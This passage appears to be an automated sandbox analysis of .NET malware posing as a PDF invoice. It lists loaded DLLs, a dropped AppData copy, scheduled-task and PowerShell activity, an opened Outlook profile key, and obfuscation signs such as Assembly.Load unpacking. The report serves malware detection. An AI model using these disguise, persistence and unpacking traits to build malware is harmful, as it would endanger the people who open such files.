                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: eIf.pdbSHA256 source: Proforma Invoice_21-1541 And Packing List.pdf.exe, vrhZELiHpiub.exe.0.dr
                Source: Binary string: System.Windows.Forms.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: eIf.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, vrhZELiHpiub.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: vrhZELiHpiub.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, wvrdGM0ZpKZGfbxjQ7.cs.Net Code: ptqj3ZhkUb System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, wvrdGM0ZpKZGfbxjQ7.cs.Net Code: ptqj3ZhkUb System.Reflection.Assembly.Load(byte[])
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: 0xB1944EA2 [Thu May 29 11:38:10 2064 UTC]
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053C6DBE push es; ret 0_2_053C6DBF
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B06D5A0 push es; ret 0_2_0B06D5B0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269891E pushad ; iretd 9_2_0269891F
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02698C2F pushfd ; iretd 9_2_02698C30
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02698DDF push esp; iretd 9_2_02698DE0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06582DBE pushfd ; retf 9_2_06582DC1
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111891E pushad ; iretd 13_2_0111891F
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_01118DDF push esp; iretd 13_2_01118DE0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_01118C2F pushfd ; iretd 13_2_01118C30
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: section name: .text entropy: 7.8740976110674445
                Source: vrhZELiHpiub.exe.0.drStatic PE information: section name: .text entropy: 7.8740976110674445
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, mhimEujUKu7M0BJFWx.csHigh entropy of concatenated method names: 'TmQEu9CVxT', 'YZbE0L9COx', 'ieGErveFRZ', 'HH2EBXpk8c', 'o9PEZeZkXd', 'lbsEoTWAme', 'JanQInV25FumL089oA', 'K4pxPZ1gMOW0eirJIU', 'rpDEEeOXiT', 'tpKEpX9L3B'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, DALH0Ea91JySiQTHL0.csHigh entropy of concatenated method names: 'qiPVUAHgNa', 'uKTVqEFScy', 'Nma6D1oaLx', 'jJ16EutHxf', 'DBHV5iv5Im', 'I0QVyJBNjK', 'oFDVlvhGUR', 'k7KVHZ074d', 'jPgVsJsy0q', 'HZDVbuIwoM'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, h95BIkejnF9uJ8Ra5v.csHigh entropy of concatenated method names: 'MZyuCUWfDg', 'ttIuNmGNkX', 'Lkpu3FGv8w', 'mXBuTksGZR', 'sgMuQt0RtC', 'l2fuAcInD7', 'VQju40IKNa', 'z9wuWNkump', 'fsjuv5KG2D', 'kiiuwRampG'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, Y3k9dO2eMLXGNq5ySi.csHigh entropy of concatenated method names: 'lZI6Ifod5k', 'PKB6x9W0pw', 'zyg6RKypGt', 'hxY6tvJdKI', 'jw26H9950v', 'R5P61HpwAL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, B9CVxTWqZbL9COxYSC.csHigh entropy of concatenated method names: 'ARVGHI5TDq', 'ch1GseZ7pl', 'H8BGbK7qdj', 'CE7GgmITns', 'tP0GSK4mXD', 'g2sGaI4QgJ', 'ub0GkbJ6Mp', 'DamGUTA5Yv', 'qfeG2if0Kf', 'HsDGq4LQAX'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, VXdFbsITWAmen4IAUk.csHigh entropy of concatenated method names: 'lppKhvt69n', 'jI0KGwBlqb', 'EPxKY0T4a6', 'AhRKujZwqt', 'HVqK0KbWe6', 'do1YSFtIOy', 'ihxYaD9pa3', 'Ij9YkZALfV', 'iV5YU73sf2', 'Ik7Y2Xe9FD'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, svHqcNluLpvGPX5ECE.csHigh entropy of concatenated method names: 'Bdp9W7gyeg', 'fUs9vTMmxI', 'PxE9IsdxRJ', 'HlB9xTkFnb', 'GI29ta2eW4', 'Ju491GXMCr', 'SaH9PWyqvq', 'pbg9JfYDgw', 'C0Z98ocJLy', 'YdY95H71NY'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, R6t6WaEpRUJ1DtPHOLl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dPbdHhnqyy', 'INUdss5pj8', 'uWwdbmGEmR', 'BjjdgN3JDE', 'MhTdSu989h', 'cUZdaccBtv', 'Rp6dkYRZ8A'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csHigh entropy of concatenated method names: 'nH8phE8rwk', 'oeTpM1O1A7', 'mU4pG6qJmw', 'felpmSeUdG', 'uAlpYFPXtO', 'Kt3pKXI8BJ', 'NPnpuNfCgd', 'N1pp03OVpY', 'neupFx2aBY', 'nI6prEkTRp'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, gQF5JWzxeqciQn3QRX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IjWL9n974P', 'wv1LZkqgmv', 'o56LoKkkya', 'XkjLVkH1C8', 'WkUL6TIXkw', 'f9VLLKcNvy', 'tvILdAc8SF'
